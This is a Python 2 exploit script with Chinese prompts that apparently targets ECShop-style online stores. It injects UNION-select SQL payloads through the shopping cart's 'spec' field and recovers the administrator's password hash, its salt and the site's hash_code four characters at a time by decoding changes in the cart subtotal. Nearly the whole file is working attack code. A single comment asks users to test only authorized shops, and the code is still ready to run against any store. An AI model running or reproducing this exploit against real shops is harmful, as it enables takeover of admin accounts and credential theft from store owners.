#coding=gbk
#/usr/bin/env python
import urllib2,sys
import cookielib
import requests
import re,binascii
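# Target parameters are read interactively (there is no argv handling).
# This script sends SQL-injection payloads to the given host: only point it
# at a shop you are authorized to test.
attackurl = raw_input("输入漏洞网站:").strip().rstrip("/")  # base URL; a trailing "/" would otherwise give ".../flow.php" a doubled slash
attackid = raw_input("输入物ID:").strip()          # goods id used as goods.php?id=<attackid>
attackprice = raw_input("输入物品价格:").strip()   # real price of that item; sqlinjection() subtracts it from the leaked subtotal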
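def postdata(url, data="", regex="", session=None):
  """POST ``data`` to ``url`` through the shared session and optionally scrape the reply.

  Args:
    url: absolute URL to POST to.
    data: form body (dict or string); the empty-string default sends an empty body.
    regex: optional pattern searched in the response text with re.findall.
    session: object with ``.post(url, data)`` (a requests.Session); defaults to
      the module-level ``s`` created under ``__main__``. The parameter only
      exists so the helper can be exercised without a network.

  Returns:
    ``regex`` empty -> the response text.
    ``regex`` given -> ``(text, first_match_or_None)``. The original returned the
    bare text when nothing matched, so every caller's ``[1]`` silently picked
    the second character of the page; ``None`` makes the miss explicit.
  """
  if session is None:
    session = s
  response = session.post(url, data)
  text = response.text
  print(text)  # verbose on purpose: the original dumped every page fetched
  if regex == "":
    return text
  found = re.findall(regex, text)
  return text, (found[0] if found else None)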
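def infomation(url):
  """Record the goods id and the first specification id of the product page.

  Sets the module globals read by sqlinjection():
    goods: numeric ``id=`` values found in ``url`` (goods[0] is used).
    spec:  postdata() result for the page with pattern ``spec_value_<n>``;
           spec[1] is the first specification id.

  Raises:
    ValueError: ``url`` carries no numeric ``id=`` or the page shows no
      ``spec_value_<n>``. Without a spec the later payload would post
      garbage to the target, so fail here with a readable message instead
      of an IndexError further down.
  """
  global spec, goods
  goods = re.findall(r'id=(\d{1,5})', url)
  if not goods:
    raise ValueError("no numeric id= parameter in %s" % url)
  spec = postdata(url, regex=r"spec_value_(\d{1,10})")
  # older postdata() returned the bare page text on a miss; treat that as "no spec" too
  if not (isinstance(spec, tuple) and len(spec) > 1 and spec[1]):
    raise ValueError("no spec_value_<n> on %s; choose a goods id that has specifications" % url)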
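def _matched(response):
  """Return the regex capture from a postdata() result, or None when there is none.

  postdata() returns ``(text, match)`` when a regex was given; an older build
  returned the bare text on a miss, so a non-tuple is treated as no match
  instead of being indexed.
  """
  if isinstance(response, tuple) and len(response) > 1:
    return response[1]
  return None

def sqlinjection(sql):
  """Run one UNION payload through the cart and decode the 4 leaked bytes.

  The channel, as visible in the requests below: ``sql`` becomes the second
  entry of the ``spec`` array in the add_to_cart JSON. The callers' payloads
  close a quoted value (``2') and 1=2 union select hex(substring(...)) ...
  order by attr_price desc #``), so the selected hex string apparently ends
  up as the item's price. After forcing a cart update the subtotal is read
  back, the real item price (``attackprice``) is subtracted and the remaining
  decimal digits are the hex encoding of 4 leaked bytes. That decode only
  works when every leaked byte hex-encodes to decimal digits, which holds
  for the ``[0-9a-f]`` characters of a hex digest (0x30-0x39, 0x61-0x66);
  other characters would not survive the numeric conversion.

  Args:
    sql: injection string, inserted verbatim into the ``spec`` JSON array.

  Returns:
    the 4 leaked bytes (a ``str`` on Python 2), or None when the subtotal
    could not be read.

  Raises:
    RuntimeError: the cart page has no ``goods_number[...]`` input, i.e. the
      add_to_cart request did not take.
    ValueError: subtotal minus ``attackprice`` is negative or has an odd
      number of digits — almost always a wrong ``attackprice``.

  The cart is cleared on every exit path: a leftover item would be added to
  the next subtotal and corrupt every following extraction.
  """
  payload = {"goods": """{"quick":1,"spec":["%s","%s"],"goods_id":%s,"number":"1","parent":0}""" % (spec[1], sql, goods[0])}
  cart_url = attackurl + "/flow.php"
  try:
    postdata(attackurl + "/flow.php?step=add_to_cart", payload, regex=u"总计金额" + r"\s\S(\d{1,10})")
    goods_num = _matched(postdata(cart_url, regex=r"goods_number\[.*\]"))
    if goods_num is None:
      raise RuntimeError("cart page has no goods_number[...] field; add_to_cart did not succeed")
    # "submit" is the pre-URL-encoded GBK label of the shop's update button
    # (requests encodes it once more); presumably the server keys on
    # step=update_cart only — confirm if updates start failing.
    form = {goods_num: "1", "submit": "%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5", "step": "update_cart"}
    postdata(cart_url, form, regex=u"购物车更新成功")
    new_price = _matched(postdata(cart_url, regex=u"购物金额小计" + r"\s\S(\d{1,10})"))
    if not new_price:
      return None
    digits = str(int(new_price) - int(attackprice))
    if digits.startswith("-") or len(digits) % 2:
      raise ValueError("leaked value %s is not an even-length hex string; check that the item price %s is right" % (digits, attackprice))
    return binascii.a2b_hex(digits)
  finally:
    # The original appended "/flow.php?step=clear" to cart_url, producing
    # ".../flow.php/flow.php?step=clear"; clear is a sibling of flow.php.
    postdata(attackurl + "/flow.php?step=clear")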
def get_salt():
  """Leak the first 4 characters of ec_salt for admin user_id=1 and print them."""
  query = ("2') and 1=2 union select hex(substring(ec_salt from 1 for 4)) "
           "from ecs_admin_user where user_id=1 order by attr_price desc #")
  print("salt is : " + sqlinjection(query))
def get_hash_code():
  """Leak ecs_shop_config.hash_code (32 characters) 4 at a time, printing the partial value after each chunk."""
  template = ("2') and 1=2 union select hex(substring(value from %d for 4)) "
              "from ecs_shop_config where code='hash_code' order by attr_price desc #")
  leaked = ""
  # substring offsets 1, 5, ..., 29: eight 4-character chunks
  for start in range(1, 33, 4):
    leaked += sqlinjection(template % start)
    print("hash_code is : " + leaked)
def get_admin_pass():
  """Leak the password hash of admin user_id=1, then the salt and hash_code.

  Accumulates into the module global ``passwd`` (as before) and prints the
  partial hash after each 4-character chunk.
  """
  global passwd
  template = ("2') and 1=2 union select hex(substring(password from %d for 4)) "
              "from ecs_admin_user where user_id=1 order by attr_price desc #")
  passwd = ""
  # substring offsets 1, 5, ..., 29: eight 4-character chunks of a 32-char hash
  for start in range(1, 33, 4):
    passwd += sqlinjection(template % start)
    print("admin_password is : " + passwd)
  get_salt()
  get_hash_code()
if __name__ == "__main__":
  s = requests.Session()  # shared by postdata(): keeps the shop's session cookie across the cart requests
  # goods.php?id=<attackid> has to exist on the target; pick another id otherwise
  url = "%s/goods.php?id=%s" % (attackurl, attackid)
  infomation(url)
  print("开始破解...(时间有点长,请耐心等待)")
  get_admin_pass()
